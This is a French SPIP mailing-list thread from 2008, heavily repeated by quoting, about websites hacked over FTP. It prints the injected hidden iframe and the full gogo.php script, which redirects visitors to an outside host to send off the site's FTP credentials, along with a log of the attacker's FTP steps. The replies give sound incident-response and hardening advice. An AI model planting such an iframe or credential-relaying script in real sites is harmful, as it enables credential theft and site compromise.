Bonjour,
nous avons quelques sites sous spip et aujourd'hui nous avons remarqué qu'un cracker c'était gentilment invité chez nous.
L'auteur installe dans le fichier index.php à la racine en entête :
<iframe style="width:0px; height:0px; border: 0px" src="UPLDR\gogo.php"></iframe>
Il crée un repertoire et un fichier :UPLDR\gogo.php
fichier gogo.php
<?
$ftp_name = "ftp://nom_du__login_ftp:mot_de_passe_ftp@ftp.1000gp.ovh.net";
$remote_host = "http://alojados.com/images/put.php";
if (file_exists("already.sent"))
{
exit(0);
} else
{
$fp = fopen("already.sent", "w");
fclose($fp);
}
?>
<html><head><meta http-equiv="Refresh" content="0;url=<?echo $remote_host."?srv=".$_SERVER['SERVER_NAME']."&ftp=".$ftp_name;?>"></head>
Le 23 juin 2008 15:37, jmi LT <contact@landes-tourisme.info> a écrit :
Bonjour,
nous avons quelques sites sous spip et aujourd'hui nous avons remarqué qu'un
cracker c'était gentilment invité chez nous.
L'auteur installe dans le fichier index.php à la racine en entête :
<iframe style="width:0px; height:0px; border: 0px"
src="UPLDR\gogo.php"></iframe>
Le 23 juin 2008 15:52, jmi LT <contact@landes-tourisme.info> a écrit :
Salut,
c'est ce que nous sommes entrain de faire néanmoins je pense que l'intérêt
serait d'identifier c la faille non ?
Merci pour l'aide, pas évident quand ça arrive
De mémoire, il me semble qu'il y a une faille identifiée sur la
version 1.9.2 c et la version d corriges justement cette faille dont
je pense tu as du être victime, à voir dans les archives de la liste.
Par contre penses aussi à vérifier que ton marqueur adsense est bien
le tient pas et celui du pirate.
@+
Commences par virer les lignes de codes des fichiers infectés, puis
Non, surtout pas : commence par noter la date et heure précises
(à la seconde près) des fichiers pourris. Car c'est a partir de
cette information que tu pourras repérer quelque chose dans tes
logs. Conserve aussi une copie de gogo.php et fais un backup
complet des fichiers, et récupère aussi les logs apache, voire
ftp ou autre.
penses à mettre à jour spip : Télécharger SPIP - SPIP
Et changer tes mots de passes ovh pour le ftp et la base de donnée.
@+
Bonjour,
nous avons quelques sites sous spip et aujourd'hui nous avons remarqué qu'un cracker c'était gentilment invité chez nous.
L'auteur installe dans le fichier index.php à la racine en entête :
<iframe style="width:0px; height:0px; border: 0px" src="UPLDR\gogo.php"></iframe>
bonjour,
sur l'interface publique, rien de visible, mais dans le code source on retrouve
<iframe style="width:0px; height:0px; border: 0px" src="UPLDR\gogo.php"></iframe>
Sur le ftp on a un repertoire UPLDR\ de créé avec un ou deux fichiers.
Jmi
Didier a écrit :
jmi LT a écrit :
Bonjour,
nous avons quelques sites sous spip et aujourd'hui nous avons remarqué qu'un cracker c'était gentilment invité chez nous.
L'auteur installe dans le fichier index.php à la racine en entête :
<iframe style="width:0px; height:0px; border: 0px" src="UPLDR\gogo.php"></iframe>
Afin de poser le problème plus clairement :
Infos sur les sites touchés :
Pas tous chez le même hébergeur
Pas tous sous spip
Pas tous les sites que nous avons
Les sites sous spip pas tous à la même version
Un seul de nous possède tous les ftp sur dreamweaver et fillezilla ( ceux des sites touchés et ceux non touchés )
Voila un récap des opérations trouvés dans les logs ftp :
Fichier déposé : ftpchk3.php
Passge du fichier en CHMOD 777
Listage des fichiers : LIST index.*
destruction du fichier : DELE ftpchk3.php
recup du fichier index
renvois du fichier index
creation du rep : MKD UPLDR
passage en chmod 777 : SITE CHMOD 777 UPLDR
placement du fichier gogo.php STOR gogo.php"
Aucune autre activité détecté sur le serveur FTP pour l'instant
Voila pour les infos, si l'un d'entre vous à des idées sur l'origine du problème...
Merci
Fil a écrit :
André Payan <andre.payan <at> gmail.com> writes:
Commences par virer les lignes de codes des fichiers infectés, puis
Non, surtout pas : commence par noter la date et heure précises
(à la seconde près) des fichiers pourris. Car c'est a partir de
cette information que tu pourras repérer quelque chose dans tes
logs. Conserve aussi une copie de gogo.php et fais un backup
complet des fichiers, et récupère aussi les logs apache, voire
ftp ou autre.
penses à mettre à jour spip : Télécharger SPIP - SPIP
Et changer tes mots de passes ovh pour le ftp et la base de donnée.
@+
Après, oui.
-- Fil
_______________________________________________
liste spip
spip@rezo.net - désabonnement : spip-off@rezo.net
De mémoire, il me semble qu'il y a une faille identifiée sur la
version 1.9.2 c et la version d corriges justement cette faille dont
je pense tu as du être victime, à voir dans les archives de la liste.
non, de memoire aussi, c'etait plutot une faille de type injection sql qui a été corrigée entre la 1.9.2c et la 1.9.2d, donc peu probable que le souci vienne de la.
Le but du script est de faire remonter les identifiants sur un serveur (lui meme hacké).
C'est sans doute un script qui casse les mots de passe et laisse ca derrière lui, comme ca c'est le premier qui se connecte derriere qui provoque l'envoi des mots de passe.
je suppose que le put.php qu'il y a de l'autre coté, sert de relai et que les identifiants sont trimbalés de serveur en serveur pour brouiller les pistes
pensez donc à avoir des mots de passe avec plus de 8 caracteres contenant majuscules / minuscules et chiffres (avec un ou deux caracteres speciaux en plus, c'est mieux) et differents sur le FTP / MySQL / SSH ...
En ce moment chez free, à lire les demandes de déblocage, j'ai l'impression que 9 sites hackés sur 10 se sont fait piraté les identifiants en brut force (le 10eme etant un joomla avec un module pas à jour).
Afin de poser le problème plus clairement :
Infos sur les sites touchés :
Pas tous chez le même hébergeur
Pas tous sous spip
Pas tous les sites que nous avons
Les sites sous spip pas tous à la même version
Un seul de nous possède tous les ftp sur dreamweaver et fillezilla ( ceux des sites touchés et ceux non touchés )
Voila un récap des opérations trouvés dans les logs ftp :
et il est rentré directement avec les clés ou il a forcé la porte ???
rien de louche dans les logs quelques minutes avant ?
Fichier déposé : ftpchk3.php
Passge du fichier en CHMOD 777
la tu dois avoir un hit dessus, il doit venir du meme serveur qui a cassé le mot de passe.
pas la peine de courir après, il y a sans doute plusieurs relais et il faudrait remonter plusieurs attaques pour tomber sur l'adresse de provenance initiale... sans doute une IP anonymisée.
Par contre tu peux regarder plus haut dans les logs si tu vois cette IP
Listage des fichiers : LIST index.*
destruction du fichier : DELE ftpchk3.php
recup du fichier index
renvois du fichier index
ca c'est bizarre, c'etait plus simple de faire un chmod et de laisser le script modifier directement l'index.
il faudrait envoyer un mail à l'admin du serveur d'origine pour savoir comment ils ont été hacké parce que le coup de l'aller/retour FTP, ca ressemble à du "manuel".
combien de temps entre la recup et le renvoi de l'index ?
penses à mettre à jour spip : Télécharger SPIP - SPIP
Et changer tes mots de passes ovh pour le ftp et la base de donnée.
@+
Après, oui.
heu, les mots de passe, c'est tout de suite quand on decouvre ce genre de choses, par contre effectivement, le mieux c'est de sauvegarder et surtout de rapatrier les logs rapidement avant de remettre en etat
Afin de poser le problème plus clairement :
Infos sur les sites touchés :
Pas tous chez le même hébergeur
Pas tous sous spip
Pas tous les sites que nous avons
Les sites sous spip pas tous à la même version
Un seul de nous possède tous les ftp sur dreamweaver et fillezilla ( ceux des sites touchés et ceux non touchés )
Voila un récap des opérations trouvés dans les logs ftp :
et il est rentré directement avec les clés ou il a forcé la porte ???
rien de louche dans les logs quelques minutes avant ?
Heu, comment savoir ?
Log ftp rien du tout, connecté direct
Fichier déposé : ftpchk3.php
Passge du fichier en CHMOD 777
la tu dois avoir un hit dessus, il doit venir du meme serveur qui a cassé le mot de passe.
pas la peine de courir après, il y a sans doute plusieurs relais et il faudrait remonter plusieurs attaques pour tomber sur l'adresse de provenance initiale... sans doute une IP anonymisée.
oui carrement l'IP est differente sur chaque site hacké
Par contre tu peux regarder plus haut dans les logs si tu vois cette IP
Listage des fichiers : LIST index.*
destruction du fichier : DELE ftpchk3.php
recup du fichier index
renvois du fichier index
ca c'est bizarre, c'etait plus simple de faire un chmod et de laisser le script modifier directement l'index.
il faudrait envoyer un mail à l'admin du serveur d'origine pour savoir comment ils ont été hacké parce que le coup de l'aller/retour FTP, ca ressemble à du "manuel".
combien de temps entre la recup et le renvoi de l'index ?
Le tout a été effectué en 11 s
penses à mettre à jour spip : Télécharger SPIP - SPIP
Et changer tes mots de passes ovh pour le ftp et la base de donnée.
@+
Après, oui.
heu, les mots de passe, c'est tout de suite quand on decouvre ce genre de choses, par contre effectivement, le mieux c'est de sauvegarder et surtout de rapatrier les logs rapidement avant de remettre en etat
Merci de votre aide a tous, pas évident quand on est dans la panade
@++
_______________________________________________
liste spip
spip@rezo.net - désabonnement : spip-off@rezo.net
et il est rentré directement avec les clés ou il a forcé la porte ???
rien de louche dans les logs quelques minutes avant ?
Heu, comment savoir ?
Log ftp rien du tout, connecté direct
donc il l'a piqué ailleurs, sans doute le mot de passe sert aussi pour un accès webmail et/ou console d'admin et il est passé par la.
le mot de passe était long ? compliqué ?
Fichier déposé : ftpchk3.php
Passge du fichier en CHMOD 777
la tu dois avoir un hit dessus, il doit venir du meme serveur qui a cassé le mot de passe.
pas la peine de courir après, il y a sans doute plusieurs relais et il faudrait remonter plusieurs attaques pour tomber sur l'adresse de provenance initiale... sans doute une IP anonymisée.
oui carrement l'IP est differente sur chaque site hacké
ah ?
et ca correspond au serveur ou il va deposer les accès ? les attaques partaient de serveurs differents et c'est une machine qui centralisait les infos ? ou rien ne relit les attaques ?
Par contre tu peux regarder plus haut dans les logs si tu vois cette IP
Listage des fichiers : LIST index.*
destruction du fichier : DELE ftpchk3.php
recup du fichier index
renvois du fichier index
ca c'est bizarre, c'etait plus simple de faire un chmod et de laisser le script modifier directement l'index.
il faudrait envoyer un mail à l'admin du serveur d'origine pour savoir comment ils ont été hacké parce que le coup de l'aller/retour FTP, ca ressemble à du "manuel".
combien de temps entre la recup et le renvoi de l'index ?
Le tout a été effectué en 11 s
bon ben c'est un script alors, c'est bizarre, je vois pas l'interet de l'aller retour, c'etait plus simple et moins visible de passer directement par le premier script injecté.
Ca doit etre des questions de droits plus souvent accessibles sur le compte FTP que sur le user apache (safemode) ou alors peut etre un script généraliste capable d'inserer ses medouilles dans plusieurs langages ?
enfin, en tous cas, spip n'a pas l'air d'etre en cause, mais on peut peut etre reflechir à un plugin qui fasses un controle d'integrité sur les index.* et spip.php en tache de fond.
Ca n'est valable que pour les attaques qui ne se montrent pas (insertion de scripts, de pub ou d'iframe) mais ca en rassurerait deja quelques uns et ca permettrait d'agir avant de se retrouver blacklisté pour pishing...
on peut aussi travailler du coté de l'installeur ou du panneau de configuration pour mettre en alerte le webmaster si le mot de passe n'est pas tres securisé.
Amha, c'est une reflexion à mener car Spip s'adresse à un public qui n'a pas forcement conscience de tout cela, en particulier pour les sites Spip chez free ou les 3/4 des utilisateurs ont le meme mot de passe de moins 8 caracteres qui ouvre toutes les portes.
et il est rentré directement avec les clés ou il a forcé la porte ???
rien de louche dans les logs quelques minutes avant ?
Heu, comment savoir ?
Log ftp rien du tout, connecté direct
donc il l'a piqué ailleurs, sans doute le mot de passe sert aussi pour un accès webmail et/ou console d'admin et il est passé par la.
le mot de passe était long ? compliqué ?
Le mot de passe sert uniquement au ftp, il etait de 8 caractere me semble-til
Fichier déposé : ftpchk3.php
Passge du fichier en CHMOD 777
la tu dois avoir un hit dessus, il doit venir du meme serveur qui a cassé le mot de passe.
pas la peine de courir après, il y a sans doute plusieurs relais et il faudrait remonter plusieurs attaques pour tomber sur l'adresse de provenance initiale... sans doute une IP anonymisée.
oui carrement l'IP est differente sur chaque site hacké
ah ?
et ca correspond au serveur ou il va deposer les accès ? les attaques partaient de serveurs differents et c'est une machine qui centralisait les infos ? ou rien ne relit les attaques ?
Le site qui recevait les infos, cela semble etre le seul lien
Par contre tu peux regarder plus haut dans les logs si tu vois cette IP
Listage des fichiers : LIST index.*
destruction du fichier : DELE ftpchk3.php
recup du fichier index
renvois du fichier index
ca c'est bizarre, c'etait plus simple de faire un chmod et de laisser le script modifier directement l'index.
il faudrait envoyer un mail à l'admin du serveur d'origine pour savoir comment ils ont été hacké parce que le coup de l'aller/retour FTP, ca ressemble à du "manuel".
combien de temps entre la recup et le renvoi de l'index ?
Le tout a été effectué en 11 s
bon ben c'est un script alors, c'est bizarre, je vois pas l'interet de l'aller retour, c'etait plus simple et moins visible de passer directement par le premier script injecté.
Ca doit etre des questions de droits plus souvent accessibles sur le compte FTP que sur le user apache (safemode) ou alors peut etre un script généraliste capable d'inserer ses medouilles dans plusieurs langages ?
enfin, en tous cas, spip n'a pas l'air d'etre en cause, mais on peut peut etre reflechir à un plugin qui fasses un controle d'integrité sur les index.* et spip.php en tache de fond.
Ca n'est valable que pour les attaques qui ne se montrent pas (insertion de scripts, de pub ou d'iframe) mais ca en rassurerait deja quelques uns et ca permettrait d'agir avant de se retrouver blacklisté pour pishing...
on peut aussi travailler du coté de l'installeur ou du panneau de configuration pour mettre en alerte le webmaster si le mot de passe n'est pas tres securisé.
Amha, c'est une reflexion à mener car Spip s'adresse à un public qui n'a pas forcement conscience de tout cela, en particulier pour les sites Spip chez free ou les 3/4 des utilisateurs ont le meme mot de passe de moins 8 caracteres qui ouvre toutes les portes.
@++
Peut être un hack d'une de nos machine ? Un vers au autre cheval de troie ?
On a passé les machines a l'anti virus, anti spyware... et rien trouvé ???
Merci de votre aide
_______________________________________________
liste spip
spip@rezo.net - désabonnement : spip-off@rezo.net
et il est rentré directement avec les clés ou il a forcé la porte ???
rien de louche dans les logs quelques minutes avant ?
Heu, comment savoir ?
Log ftp rien du tout, connecté direct
donc il l'a piqué ailleurs, sans doute le mot de passe sert aussi pour un accès webmail et/ou console d'admin et il est passé par la.
le mot de passe était long ? compliqué ?
Le mot de passe sert uniquement au ftp, il etait de 8 caractere me semble-til
ouch, ca c'est pas une bonne nouvelle...
Si il n'y a pas de trace d'attaque (dictionnaire ou brut force, mais ca peut dater de quelques jours) dans tes logs FTP, ca veut dire qu'il a été piqué "au vol" au moment d'une connexion.
Si c'est ca, la seule parade, c'est de faire du SFTP, sinon ca recommencera.
Mais j'y crois moyennement, sauf si tu as des ennemis...
Ca doit quand meme pas etre evident d'aller sniffer les connexions FTP vers OVH ou sortant de chez toi.
regarde un peu plus haut dans les logs.
et ca correspond au serveur ou il va deposer les accès ? les attaques partaient de serveurs differents et c'est une machine qui centralisait les infos ? ou rien ne relit les attaques ?
Le site qui recevait les infos, cela semble etre le seul lien
ca plaide quand meme pour une attaque du FTP par dictionnaire ou brut force, les machines fantomes se chargeant de casser le mot de passe et de laisser le script pour le rapatrier sur un site central.
Si attaque dictionnaire ou brut force je devrais avoir des tentatives de connection dans les logs ftp non (ce qui n'est pas le cas )?
Autre possibilité, on a utilisé une version de filezilla que l'on pensait avoir en mise a jours auto mais ...non :-(. Cette version etait en fait assez ancienne une 2.2.11 et j'ai vu qu'il y avait des failles de secu, est ce possible qu'un hacker arrive a entrer sur un poste et recupere les log et pass ou qu'il arrive a intercepter les logs a la volée ?
Pour info, certain ftp crakés n'ont pas été utilisés depuis fort longtemps .
Merci
@+
jmi
Stephane a écrit :
jmi LT a écrit :
Stephane a écrit :
jmi LT a écrit :
et il est rentré directement avec les clés ou il a forcé la porte ???
rien de louche dans les logs quelques minutes avant ?
Heu, comment savoir ?
Log ftp rien du tout, connecté direct
donc il l'a piqué ailleurs, sans doute le mot de passe sert aussi pour un accès webmail et/ou console d'admin et il est passé par la.
le mot de passe était long ? compliqué ?
Le mot de passe sert uniquement au ftp, il etait de 8 caractere me semble-til
ouch, ca c'est pas une bonne nouvelle...
Si il n'y a pas de trace d'attaque (dictionnaire ou brut force, mais ca peut dater de quelques jours) dans tes logs FTP, ca veut dire qu'il a été piqué "au vol" au moment d'une connexion.
Si c'est ca, la seule parade, c'est de faire du SFTP, sinon ca recommencera.
Mais j'y crois moyennement, sauf si tu as des ennemis...
Ca doit quand meme pas etre evident d'aller sniffer les connexions FTP vers OVH ou sortant de chez toi.
regarde un peu plus haut dans les logs.
et ca correspond au serveur ou il va deposer les accès ? les attaques partaient de serveurs differents et c'est une machine qui centralisait les infos ? ou rien ne relit les attaques ?
Le site qui recevait les infos, cela semble etre le seul lien
ca plaide quand meme pour une attaque du FTP par dictionnaire ou brut force, les machines fantomes se chargeant de casser le mot de passe et de laisser le script pour le rapatrier sur un site central.
@++
_______________________________________________
liste spip
spip@rezo.net - désabonnement : spip-off@rezo.net
Si attaque dictionnaire ou brut force je devrais avoir des tentatives de connection dans les logs ftp non (ce qui n'est pas le cas )?
Autre possibilité, on a utilisé une version de filezilla que l'on pensait avoir en mise a jours auto mais ...non :-(. Cette version etait en fait assez ancienne une 2.2.11 et j'ai vu qu'il y avait des failles de secu, est ce possible qu'un hacker arrive a entrer sur un poste et recupere les log et pass ou qu'il arrive a intercepter les logs a la volée ?
Pour info, certain ftp crakés n'ont pas été utilisés depuis fort longtemps .
bon, ben la, je seche alors...
si les comptes ne servent qu'au FTP et qu'ils ont été utilisé directement sans trace d'erreur, c'est que le hacker avait les code.
Dans ce cas, pourquoi s'amuserait-il à faire tout ce micmac pour les faire remonter sur un serveur.
Non, c'est sans doute que le mot de passe a été cassé par un autre moyen (LDAP ? SSH ? ...) et/ou tu n'en as pas de trace (pas de trou dans les logs ? des fois qu'il en profite pour faire le menage mais c'est rarement accessible en FTP ou via un script PHP un fichier de log...)
ou alors tu as chopé un trojan qui à envoyé les mails ou tu avais les identifiants ou ton filezilla.xml (jamais entendu parler d'un truc qui fasse ca, mais pourquoi pas)
Bah, de toutes facons, à part changer les mots de passe et rester vigilant, je ne vois pas ce que tu peux faire...